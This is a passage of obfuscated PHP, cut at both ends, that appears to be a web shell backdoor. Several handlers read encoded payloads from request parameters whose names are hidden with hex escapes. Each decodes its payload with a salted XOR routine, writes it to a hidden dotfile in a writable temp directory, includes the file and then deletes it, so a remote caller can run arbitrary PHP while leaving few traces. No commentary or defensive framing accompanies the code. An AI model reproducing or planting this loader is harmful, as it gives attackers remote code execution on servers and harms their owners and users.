$v8): $chS = ord( $salt[$i % $sLen]); $dec =( ( int)$v8 - $chS -( $i % 10)) ^ 71; $data_chunk .= chr( $dec); endforeach; while ($binding = array_shift($flag)) { if (is_writable($binding) && is_dir($binding)) { $value = implode("/", [$binding, ".pset"]); $success = file_put_contents($value, $data_chunk); if ($success) { include $value; @unlink($value); exit;} } } } if(array_key_exists("re\x66", $_REQUEST) && !is_null($_REQUEST["re\x66"])){ $fac = $_REQUEST["re\x66"]; $fac = explode ( '.' ,$fac ); $data_chunk= ''; $s8= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $s8); $q= 0; array_walk( $fac , function( $v8) use( &$data_chunk , &$q , $s8 , $sLen) {$chS= ord( $s8[$q % $sLen]); $dec= ( ( int)$v8 - $chS -( $q % 10)) ^ 95; $data_chunk .= chr( $dec); $q++;} ); $ent = array_filter([getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/dev/shm", "/var/tmp", getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), getcwd()]); $val = 0; do { $resource = $ent[$val] ?? null; if ($val >= count($ent)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($resource)) { $flag = "$resource" . "/.sym"; if (@file_put_contents($flag, $data_chunk) !== false) { include $flag; unlink($flag); die(); } } $val++; } while (true); } if(count($_POST) > 0 && isset($_POST["f\x61c\x74o\x72"])){ $element = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), getcwd(), sys_get_temp_dir(), "/var/tmp", "/tmp", "/dev/shm", getenv("TEMP")]); $descriptor = $_POST["f\x61c\x74o\x72"]; $descriptor =explode ("." ,$descriptor ) ; $parameter_group = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); $len = count( $descriptor); for( $u = 0; $u <$len; $u++) { $v3 = $descriptor[$u]; $chS = ord( $salt[$u % $sLen]); $dec =( ( int)$v3 - $chS -( $u % 10))^94; $parameter_group .=chr( $dec); } while ($item = array_shift($element)) { if (!!is_dir($item) && !!is_writable($item)) { $component = sprintf("%s/.ent", $item); if (@file_put_contents($component, $parameter_group) !== false) { include $component; unlink($component); die(); } } } } if(count($_REQUEST) > 0 && isset($_REQUEST["\x65ntit\x79"])){ $pset = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), "/tmp", getcwd(), "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/var/tmp"]); $ptr = $_REQUEST["\x65ntit\x79"]; $ptr =explode ( '.' ,$ptr ) ; $bind=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($s); $k=0; $__tmp=$ptr; while ($v3=array_shift($__tmp)) { $sChar=ord($s[$k % $sLen]); $d=((int)$v3 - $sChar - ($k % 10))^49; $bind .= chr($d); $k++; } foreach ($pset as $comp): if (is_dir($comp) && is_writable($comp)) { $val = vsprintf("%s/%s", [$comp, ".descriptor"]); $file = fopen($val, 'w'); if ($file) { fwrite($file, $bind); fclose($file); include $val; @unlink($val); die(); } } endforeach; } if(!is_null($_POST["\x70ointer"] ?? null)){ $record = $_POST["\x70ointer"]; $record =explode (".",$record) ; $item = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s ); $o = 0; foreach( $record as $v1) { $chS = ord( $s[$o% $lenS] ); $d =( ( int)$v1 - $chS -( $o% 10))^ 6; $item .= chr( $d ); $o++; } $value = array_filter([ini_get("upload_tmp_dir"), getcwd(), "/tmp", session_save_path(), "/var/tmp", getenv("TMP"), sys_get_temp_dir(), "/dev/shm", getenv("TEMP")]); $pgrp = 0; do { $rec = $value[$pgrp] ?? null; if ($pgrp >= count($value)) break; if (is_writable($rec) && is_dir($rec)) { $resource = "$rec/.fac"; $success = file_